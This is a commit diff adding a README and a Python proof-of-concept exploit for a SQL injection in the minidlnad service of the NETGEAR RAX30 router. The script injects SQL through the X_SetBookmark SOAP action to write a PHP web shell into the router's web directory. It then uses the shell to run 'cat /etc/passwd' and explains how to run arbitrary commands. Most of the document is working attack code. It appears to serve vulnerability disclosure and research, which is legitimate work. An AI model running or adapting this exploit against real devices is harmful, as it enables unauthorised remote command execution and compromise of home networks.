Projects STRLCPY rax30-sqlinj Commits ee2657b0
  • ■ ■ ■ ■ ■ ■
     1 +# NETGEAR Nighthawk WiFi6 Router (RAX30 AX2400) LAN Side Exploit
     2 + 
     3 +## How to reproduce
     4 + 
     5 +Run Python3 exploit code
     6 + 
     7 +```sh
     8 +$ python3 [Target IP Address]
     9 +```
     10 + 
     11 +## Details
     12 + 
     13 +`minidlnad` is running on TCP port 8200.
     14 +This daemon contains a SQL injection vulnerability while processing `X_SetBookmark`.
     15 + 
     16 +```c
     17 +...
     18 + if ( sub_191D8(
     19 + dword_57B50,
     20 + "INSERT OR REPLACE into BOOKMARKS VALUES ((select DETAIL_ID from OBJECTS where OBJECT_ID = '%q'), %q)",
     21 + v2,
     22 + v3) )
     23 +...
     24 +```
     25 + 
     26 +Using SQL injection, we can execute arbitrary SQL queries, including `ATTACH DATABASE` statement.
     27 +We can create database whose file extension is `php` and content has php web shell code.
     28 + 
     29 +## Credit
     30 +- Zachary Cutlip (@zcutlip): Original discovery
     31 +- Insu Yun, Seunghyun Kim, Gyeongwon Kim: Exploit writing
     32 + 
  • ■ ■ ■ ■ ■ ■
     1 +from urllib import parse
     2 + 
     3 +import socket
     4 +import sys
     5 + 
     6 +def do_cmd(ip, name, cmd):
     7 + cmd = parse.quote(cmd)
     8 + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     9 + s.connect((ip, 80))
     10 + req = f"""GET /shares/{name}.php?cmd={cmd} HTTP/1.1
     11 +Host: {ip}
     12 + 
     13 +"""
     14 + req = req.replace("\n", "\r\n")
     15 + req = req.encode()
     16 + s.send(req)
     17 + data = b""
     18 + while b"content-length: " not in data.lower():
     19 + data += s.recv(0x1000)
     20 + content_length = int(data.lower().split(b"content-length: ", 1)[1].split(b'\r\n', 1)[0])
     21 + data = data.split(b'\r\n\r\n', 1)[1]
     22 + content_length -= len(data)
     23 + while content_length > 0:
     24 + temp = s.recv(0x1000)
     25 + data += temp
     26 + content_length -= len(temp)
     27 + 
     28 + result = data.split(b"aaaa", 1)[1].rsplit(b"bbbb", 1)[0]
     29 + print(result.decode())
     30 + s.close()
     31 + 
     32 + 
     33 +def main(ip, port):
     34 + table = "shell"
     35 + 
     36 + payload = 'aaaa<?php system($_GET["cmd"]); ?>bbbb'
     37 + payload = 'char(' + ','.join([hex(ord(c)) for c in payload]) + ')'
     38 + query = [
     39 + f'ATTACH DATABASE "/webs/shares/{table}.php" AS {table}',
     40 + f'CREATE TABLE {table}.pwn (dataz text)',
     41 + f'INSERT INTO {table}.pwn (dataz) VALUES ({payload})'
     42 + ]
     43 + 
     44 + query = "2);%s;--" % ';'.join(query)
     45 + assert(not "'" in query)
     46 + 
     47 + body = f"""
     48 +<?xml version="1.0" encoding="utf-8" ?>
     49 +<soap:Envelope>
     50 + <soap:Body>
     51 + <ObjectID>1<ObjectID>
     52 + <PosSecond>{query}<PosSecond>
     53 + </soap:Body>
     54 +</soap:Envelope>
     55 +"""
     56 + 
     57 + header = f"""POST / HTTP/1.1
     58 +Content-Type: text/xml; charset=utf-8
     59 +SOAPAction: #X_SetBookmark
     60 +Content-Length: {len(body)}
     61 + 
     62 +"""
     63 + 
     64 + req = header.replace("\n", "\r\n") + body
     65 + req = req.encode()
     66 + 
     67 + print("[*] Create web shell")
     68 + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     69 + s.connect((ip, port))
     70 + s.send(req)
     71 + s.recv(0x1000)
     72 + s.close()
     73 + print(f"[*] Now you can use webshell via `http://{ip}/shares/{table}.php?cmd=[your shell command]`")
     74 + print("[*] Print `cat /etc/passwd` result")
     75 + 
     76 + do_cmd(ip, table, "cat /etc/passwd")
     77 + 
     78 + 
     79 +if __name__ == "__main__":
     80 + if len(sys.argv) < 2:
     81 + print(f"Usage: python3 {sys.argv[0]} <IP address>", file=sys.stderr)
     82 + exit()
     83 + # minidlnad port: 8200
     84 + main(sys.argv[1], 8200)
     85 + 
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